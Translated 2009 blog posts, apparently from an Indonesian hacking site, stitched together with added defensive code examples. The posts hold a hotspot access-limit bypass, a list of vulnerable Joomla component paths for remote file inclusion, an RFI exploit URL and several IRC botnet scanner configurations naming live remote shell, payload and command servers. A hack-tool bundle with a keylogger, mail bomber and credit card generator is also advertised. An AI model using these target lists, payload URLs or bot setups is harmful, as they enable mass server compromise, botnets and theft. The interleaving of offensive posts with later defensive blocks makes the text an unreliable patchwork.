wait a moment for the computer to refresh this change, then open the site you want to visit again, BANG BANG BANG!!!... 2 more hours of free access...

you can see that if the CLICK HERE button is pressed we get free access, okay... maybe that's all... from me for now...
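The limit described above is keyed to a MAC address, so from the hotspot operator's side the observable trace is a client that reappears under a different MAC. As an added example (not part of the original post), this script scans constructed dnsmasq-style DHCP ACK lines for a hostname re-associating with a new MAC and notes whether the new MAC has the locally-administered bit set; hostnames, addresses and timestamps are made up.

```python
import re

# Constructed sample lines in dnsmasq DHCP log style: DHCPACK(iface) ip mac [hostname].
# The third line is the same laptop coming back with a fresh, locally-administered MAC.
SAMPLE_LOG = """\
Dec 15 10:02:11 gw dnsmasq-dhcp[812]: DHCPACK(wlan0) 10.0.0.23 00:1b:63:aa:bb:cc sofa-laptop
Dec 15 10:40:05 gw dnsmasq-dhcp[812]: DHCPACK(wlan0) 10.0.0.24 5c:0a:5b:11:22:33 phone
Dec 15 12:05:48 gw dnsmasq-dhcp[812]: DHCPACK(wlan0) 10.0.0.31 02:7f:19:de:ad:01 sofa-laptop
Dec 15 13:10:02 gw dnsmasq-dhcp[812]: DHCPACK(wlan0) 10.0.0.24 5c:0a:5b:11:22:33 phone
"""

ACK_RE = re.compile(
    r"DHCPACK\(\S+\) (?P<ip>\S+) (?P<mac>[0-9a-fA-F:]{17})(?: (?P<host>\S+))?")


def locally_administered(mac):
    """True when the U/L bit (bit 1 of the first octet) is set.

    Vendor-assigned MACs have it clear; randomly generated ones often set it,
    so this is a weak but cheap signal that an address was made up on the client."""
    return int(mac.split(":")[0], 16) & 0x02 != 0


def find_mac_changes(log_text):
    """Return (hostname, previous_mac, new_mac, flags) for every hostname that
    acknowledges a lease under a MAC different from the one it last used."""
    last_mac = {}
    findings = []
    for line in log_text.splitlines():
        m = ACK_RE.search(line)
        if not m or not m.group("host"):
            continue  # not an ACK, or a client that sent no hostname
        host, mac = m.group("host"), m.group("mac").lower()
        prev = last_mac.get(host)
        if prev is not None and prev != mac:
            flags = ["locally-administered"] if locally_administered(mac) else []
            findings.append((host, prev, mac, flags))
        last_mac[host] = mac
    return findings


if __name__ == "__main__":
    for host, old, new, flags in find_mac_changes(SAMPLE_LOG):
        print("%s: %s -> %s %s" % (host, old, new, " ".join(flags)))
```

The hostname is itself client-supplied, so this only catches careless re-association; a quota that should actually hold has to be tied to an authenticated account rather than to a MAC.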

Joomla Bugs

/components/com_flyspray/startdown.php?file=
/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=
/components/com_simpleboard/file_upload.php?sbp=
/components/com_hashcash/server.php?mosConfig_absolute_path=
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=
/components/com_performs/performs.php?mosConfig_absolute_path=
/components/com_forum/download.php?phpbb_root_path=
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=
/components/minibb/index.php?absolute_path=
/components/com_smf/smf.php?mosConfig_absolute_path=
/modules/mod_calendar.php?absolute_path=
/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=
/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=
/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=
/components/com_securityimages/configinsert.php?mosConfig_absolute_path=
/components/com_securityimages/lang.php?mosConfig_absolute_path=
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=
/akocomments.php?mosConfig_absolute_path=
/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
/cropcanvas.php?cropimagedir=
/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=
/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=
/components/com_zoom/includes/database.php?mosConfig_absolute_path=
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
/components/com_fm/fm.install.php?lm_absolute_path=
/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=
/components/com_lmo/lmo.php?mosConfig_absolute_path=
/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=
/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=
/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=

Monday 14 December 2009

Remote File Include (RFI)

Remote file inclusion can be described as the insertion of a file from outside a web server into one of the files on that server, with the goal that the script inside it is executed when the file it was inserted into is loaded. The technique requires that the web server is able to run server-side scripting (PHP, ASP, etc.) and that the file being injected into is written in that scripting language. The targets of remote file inclusion are usually portals or content management systems (CMS), which is why a very large number of websites are vulnerable to this type of attack.

In this article we will mostly discuss how the file inclusion process (from here on called 'injection') can happen in PHP.

° HOW DOES IT HAPPEN?
———————–

A file inclusion attack relies on a mistake or carelessness in how variables are declared in a file. A variable that is not declared or defined properly can be exploited. The conditions for an injection are:

1. Variables that are not declared properly (unsanitized variables)

The include statements in PHP have the syntax:

#1 include ($namavariable . "/file…")
#2 require_once ($namavariable . "/file…")
#3 include_once ($variable . "/file…")

Suppose we have a file named jscript.php that contains a variable like this:

include($my_ms["root"].'/error.php');

This variable makes it possible to include a file from outside the web server with a PHP injection exploit string:

http://www.target.com/[Script Path]/jscript.php?my_ms[root]=http://www.injek-pake-kaki.com/script?

The above is an exploit example for MySpeach <= v3.0.2 (my_ms[root])

2. Settings in the php.ini file

#1. register_globals=On
#2. magic_quotes=off
#3. allow_url_fopen=on
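The following is an added example, not code from the original article: it puts the include pattern described above (a path built from a request-controlled variable while register_globals is on) beside a hardened form in which the request can only choose a key from an allowlist. The file names and the ?page= parameter are hypothetical; the php.ini directive names in the comments are the real ones, including allow_url_include, which since PHP 5.2 governs include/require separately from allow_url_fopen.

```php
<?php
// Added example, not from the original article. File names and the ?page=
// parameter are hypothetical.
//
// php.ini settings that close the door described in the article:
//   register_globals  = Off   ; request data must be read from $_GET/$_POST
//   allow_url_fopen   = Off   ; no URL wrappers for fopen()/file_get_contents()
//   allow_url_include = Off   ; no URL wrappers for include/require (PHP >= 5.2)

// --- Vulnerable pattern (jscript.php in the article) ---
// With register_globals=On, ?my_ms[root]=http://evil.example/ sets
// $my_ms['root'] before this line runs, so a remote script is included:
//
//     include($my_ms["root"] . '/error.php');

// --- Hardened pattern ---
// 1. The application root is fixed in code and never taken from the request.
define('APP_ROOT', __DIR__);

// 2. A user-selectable page is a key into an allowlist, never a path fragment.
const PAGES = [
    'home'  => 'pages/home.php',
    'error' => 'pages/error.php',
];

function resolve_page(string $requested): ?string
{
    if (!array_key_exists($requested, PAGES)) {
        return null;                       // unknown key: refuse, do not guess
    }
    $path = realpath(APP_ROOT . '/' . PAGES[$requested]);
    // 3. Defence in depth: the resolved file must exist and sit under APP_ROOT,
    //    so a symlink or a later edit to the table cannot escape the tree.
    $prefix = APP_ROOT . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Only $_GET is consulted, and only as a lookup key.
$page = resolve_page((string) ($_GET['page'] ?? 'home'));
if ($page === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $page;
```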

° IS IT DANGEROUS?
-------------

File inclusion is rated High Risk, even Very Dangerous, because the injection lets the attacker perform Remote Command Execution against the server. This is extremely dangerous for a server if the attacker then tries to obtain higher privileges through local exploitation, possibly ending up with administrator or root access.

In broad terms the risks of this attack are:

1. Web root folder / subdirectory defacing.
2. Privilege escalation (obtaining higher access rights).
3. Running processes on the server (psyBNC, bots, etc.).
4. Pilfering, a.k.a. data theft (credentials, credit cards, etc.).
5. And much more, including server takeover and DDoS!

° WHICH OPERATING SYSTEMS ARE IMMUNE?
------------------------------

I am reminded of the game C&C Generals (my favourite game!) when a hacker walks out of the barracks and says "NO SYSTEMS IS SAFE!". Exactly right! No operating system is safe from injection attacks as long as it runs exploitable server-side scripting, whether it is Microsoft Windows, Linux, FreeBSD, Solaris, Darwin OS or anything else.

° WHAT SHOULD BE DONE?
-------------------------

Many white-hat portals and communities regularly publish the latest injection bugs. The safest approach is to keep up with what they release, so that you can apply the small but meaningful fixes to the CMS you may currently be using. Always watch the raw logs that your hosting service usually provides. If you see an unusual fetch such as GET /index.php?page=http://www.injek-pake-kaki.net/cmd? you should be suspicious, because it may be an attack on the website or portal you manage.

One of the safest practices for an administrator is to always watch for infiltration attempts and local exploitation attempts. Use a firewall to keep out irresponsible people, and keep an eye on which server ports are open.
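As an added example (not part of the original article), here is a small access-log scanner for the sign described above: a query parameter whose value is itself a URL. The log lines are constructed samples in Common Log Format, and the hosts and addresses in them are placeholders.

```php
<?php
// Added example, not from the original article. The log lines are constructed
// samples; hosts and client addresses are placeholders.

const SAMPLE_LOG = <<<'LOG'
203.0.113.5 - - [14/Dec/2009:10:01:02 +0700] "GET /index.php?page=home HTTP/1.1" 200 512
203.0.113.9 - - [14/Dec/2009:10:01:07 +0700] "GET /index.php?page=http://injek.example/cmd? HTTP/1.1" 200 1024
198.51.100.7 - - [14/Dec/2009:10:02:11 +0700] "GET /jscript.php?my_ms[root]=http://evil.example/script? HTTP/1.0" 200 77
198.51.100.8 - - [14/Dec/2009:10:03:00 +0700] "GET /index.php?page=news&id=3 HTTP/1.1" 200 2048
198.51.100.9 - - [14/Dec/2009:10:04:30 +0700] "GET /index.php?page=%68%74%74%70://evil.example/x? HTTP/1.1" 200 77
LOG;

/**
 * Return one record per query parameter whose (URL-decoded) value starts
 * with an http, https or ftp scheme, i.e. a remote-inclusion attempt.
 */
function find_rfi_attempts(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        // client ident user [time] "METHOD target PROTO" status bytes
        if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"/', $line, $m)) {
            continue;                       // not a request line we understand
        }
        $client = $m[1];
        $time   = $m[2];
        $target = $m[4];
        $qpos = strpos($target, '?');
        if ($qpos === false) {
            continue;                       // no query string, nothing to inspect
        }
        foreach (explode('&', substr($target, $qpos + 1)) as $pair) {
            $kv    = explode('=', $pair, 2);
            $name  = urldecode($kv[0]);
            $value = urldecode($kv[1] ?? '');
            // Decoding first also catches percent-encoded schemes (%68%74%74%70)
            if (preg_match('~^(?:https?|ftp)://~i', $value)) {
                $hits[] = ['client' => $client, 'time' => $time,
                           'param'  => $name,   'url'  => $value];
            }
        }
    }
    return $hits;
}

// Three of the five sample lines are flagged; the plain page=home and
// page=news&id=3 requests are not.
foreach (find_rfi_attempts(SAMPLE_LOG) as $h) {
    printf("%s %s %s=%s\n", $h['time'], $h['client'], $h['param'], $h['url']);
}
```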

° ENDING
------

I wrote this article based on what I know; if there are mistakes due to my ignorance, you can contact me by email. Experience is the best teacher for all of us. Anything can happen, because nobody was created perfect. Nobody is perfect! No systems is safe!

° REFERENCES
---------

- http://net-square.com/papers/one_way/one_way.html (Very simple
haxing guides)
- www.milw0rm.com (Nice place to looking for exploits and buggy things)
- http://www.packetstormsecurity.org (Great advisory, toolz, and
exploits archives)
- www.google.com (Greatest place to ask! )
- http://www.ultrapasswords.com/ (Place to cooling down... We love
streaming vids! Yeah!)

Sunday 13 December 2009

Hacker

A hacker is a person who breaks into computers, usually by gaining access to administrative controls. The subculture that has evolved around hackers is often referred to as the computer underground. Proponents claim to be motivated by artistic and political ends, and are often unconcerned about the use of criminal means to achieve them. The Jargon File, a compendium of hacker slang, defines hacker as "A person who enjoys exploring the details of programmable systems and how to stretch their capabilities, as opposed to most users, who prefer to learn only the minimum necessary." [1] The Request for Comments (RFC) 1392, the Internet Users' Glossary, amplifies this meaning as "A person who delights in having an intimate understanding of the internal workings of a system, computers and computer networks in particular." [2] These hackers are disappointed by the mass media's and mainstream public's usage of the word hacker to refer to security breakers, calling them "crackers" instead. The difference between hackers and crackers is that where hackers use their skills and knowledge to learn more about how systems and networks work, crackers use the same skills to author harmful software (viruses, trojans, etc.) and illegally infiltrate secure systems with the intention of doing harm. True hackers don't participate in these activities and generally frown upon them. Over time, the academic hacker subculture has tended to become more conscious, more cohesive, and better organized. The most important consciousness-raising moments have included the composition of the first Jargon File in 1973, the promulgation of the GNU Manifesto in 1985, and the publication of The Cathedral and the Bazaar in 1997. Correlated with this has been the gradual election of a set of shared culture heroes: Bill Joy, Donald Knuth, Dennis Ritchie, Alan Kay, Ken Thompson, Richard M. Stallman, Linus Torvalds, and Larry Wall, among others.
The concentration of academic hacker subculture has paralleled and partly been driven by the commoditization of computer and networking technology, and has in turn accelerated that process. In 1975, hackerdom was scattered across several different families of operating systems and disparate networks; today it is largely a Unix and TCP/IP phenomenon, and is concentrated around various operating systems based on free software and open-source software development.

Zell Scanner

***************************
AUTHOR: ZELL
DATE: July 2008
LANGUAGE: perl (.pl)
***************************

#!/usr/bin/perl

$process = "/usr/local/apache/bin/httpd -DSSL";
my $printcmd = "http://www.urisan.tche.br/~escola//asu/sh.txt?";
my $id = "http://www.urisan.tche.br/~escola//asu/id-vnc.txt??";
my $spread = "http://www.urisan.tche.br/~escola//asu/usil-spreads.txt?";
my $ircserver = "irc.kamtiez.punked.us";
my $start = "!scan4";
my $port = "6667";
my $nickname = "kill[RFI][" . int( rand(999) ) . "]";
my $admin = "arianom";
my $channel = "#kill-9"; ## the normal chan to scan, and see the results too :P
my $chanres = "#kill-9"; ## the channel where u can find all the results of the bot
my $verz = "Priv8 RFI Scanner v3.0 FULL VERSION";

print "\n";
print " Priv 8 Scanner\n";
print " Author: ara\n";
print " Release $verz\n";
print " Server $ircserver:$port\n";
print " $channel and $chanres\n";
print " Enjoy ;)\n\n";

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
require LWP;
$|++;

Download [complete + id]

Saturday 12 December 2009

Install Eggdrop

Eggdrop is (in my opinion) the best supported IRC bot, the most popular and the most advanced. IRC bots themselves mostly serve to help manage IRC channels. There are many kinds depending on their function, such as protection bots, game bots, zodiac bots, news bots, weather bots, channel log bots and so on (some IRC hosting companies in Indonesia rent them out to people who do not want the hassle of building one).
For anyone who wants a protection bot, though, it is better to create your own, because the settings can then be tuned to the needs of each channel, which clearly differ. Before building an eggdrop or IRC bot, a beginner needs to know what is required. Like baking a cake or making a craft, an eggdrop or IRC bot needs some basic ingredients.
What you need is a SHELL; preferably use a legal shell, which can be bought from several Indonesian IRC hosting companies (just search Google). After that prepare the config, then prepare whichever TCL scripts you want. For example, if you want a game bot, prepare a game TCL, and so on. Once you have a shell (a legal one; stealing is a sin, you know!), get PuTTY (downloadable from its site; just click the word putty). Use the Secure Shell protocol, usually abbreviated SSH, to log in to the shell.
Next, download eggdrop1.6.19.tar.gz from the eggheads FTP, then telnet and FTP to the shell. The next steps are:

1. Upload eggdrop1.6.19.tar.gz via FTP, then type tar -zxvf eggdrop1.6.19.tar.gz to extract the file.
2. Once it is extracted, enter its directory with cd eggdrop and type ./configure
3. Type make config (to compile all modules) or make iconfig (to compile only the modules you select)
4. Type make, then type make install DEST=/home/name/botdir
5. Then edit the bot config according to the notes inside the file itself.
6. Find the file named eggdrop.conf and edit it with, for example, pico/nano/vi eggdrop.conf (pick one).
7. After editing, save the file and start the bot with the command:

./eggdrop -m eggdrop.conf (the name of the config file)

After that, just add the TCL scripts you want.

The complete tutorial can be read at egghelp (very thorough, it even has TCL scripts there). It is just that most people are too lazy to read it since it is in English; most Indonesians lose interest as soon as they see a tutorial in English (he he he).

Alb Scanner

***************************
AUTHOR: Arianom
DATE: July 2008
LANGUAGE: perl (.pl)
***************************

#!/usr/bin/perl

$process = "/usr/sbin/ateam";
my $printcmd = "http://www.ambient-arts.co.uk/modules/sh.txt??";
my $id = "http://www.ambient-arts.co.uk/modules/id.txt??";
my $spread = "http://www.urisan.tche.br/pbotz.txt??";
my $ircserver = "209.41.180.98";
my $start = "!scan";
my $port = "8400";
my $nickname = "ALB[" . int( rand(999) ) . "]";
my $admin = "arianom","arianom";
my $channel = "#kamtiez"; ## the normal chan to scan
my $chanres = "#kamtiez"; ## the channel where u can find the results
my $verz = "Priv8 RFI Scanner v1.0 beta";


print "\n";
print " Priv 8 Scanner\n";
print " Author: SeaNet\n";
print " Release $verz\n";
print " Server $ircserver:$port\n";
print " $channel and $chanres\n";
print " Enjoy ;)\n\n";


use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
require LWP;
$|++;


Download [complete + id]

Friday 11 December 2009

Italian Scanner

***************************
AUTHOR: Arianom
DATE: July 2008
LANGUAGE: perl (.pl)
***************************

# SCAN RFI V.1.0 CoDe By arianom
#--------------------------------------------
#--------------------------------------------
# THE AUTHOR DISCLAIMS RESPONSIBILITY FOR ANY USE
#--------------------------------------------
# Copyright (c) 2008 arianom
#--------------------------------------------

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

my $linas_max='10';
my $sleep='1';
my $processo ="httpds";
my $cmd="http://www.bangkoksexy.com//generator/data/rr.txt??";
my $id="http://www.bangkoksexy.com//generator/data/glup.txt";
my $spread="http://www.bangkoksexy.com//generator/data/siri.txt";
my $server="irc.arianom.info.tm";
my $porta="8400";
my $numero=int(rand(100));
my $nick="[Private]".$numero;
my $canale="#staff";
my $verbot = "1.01";
my $stringa = "!scan";
my $adm = "arianom";
my $out = "!addio".$numero;
my $c0der = "arianom"; # please leave this as it is


Download [complete + id]

The Best Hack Tools Collection Ever


Include:
1. Port & IP Scanner
2. Ping & Nukes
3. Java
4. Mail Bomb
5. Chat
6. Serial Software
7. Keyboard Key Logger
8. Credit Card Generator
9. Crash Hard Drive
10.Password Recovery Tool
11.Security
12.Clients

Free Download:
1. Hotfile
2. Uploading

Thursday 10 December 2009

Feelcomz Scanner

***************************
AUTHOR: FeeLCoMz
DATE: July 2008
LANGUAGE: perl (.pl)
***************************

#!/usr/bin/perl

################################################
## Kill-9 RFI Scanner Bot v2.4 ##
## By arianom ##
## Copyleft July 2008 ##
## Usage: perl ht.pl ##
################################################

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

###################
## CONFIGURATION ##
###################

my $id = " http://pianobarcafe.com/groups/idfx.txt";
my $shell = "http://jeannedawsonart.com/images/r57???";
my $spread = "";
#my $id = "http://pianobarcafe.com/groups/idfx.txt";
#my $shell = "http://jeannedawsonart.com/images/r57???";

Download [complete + id]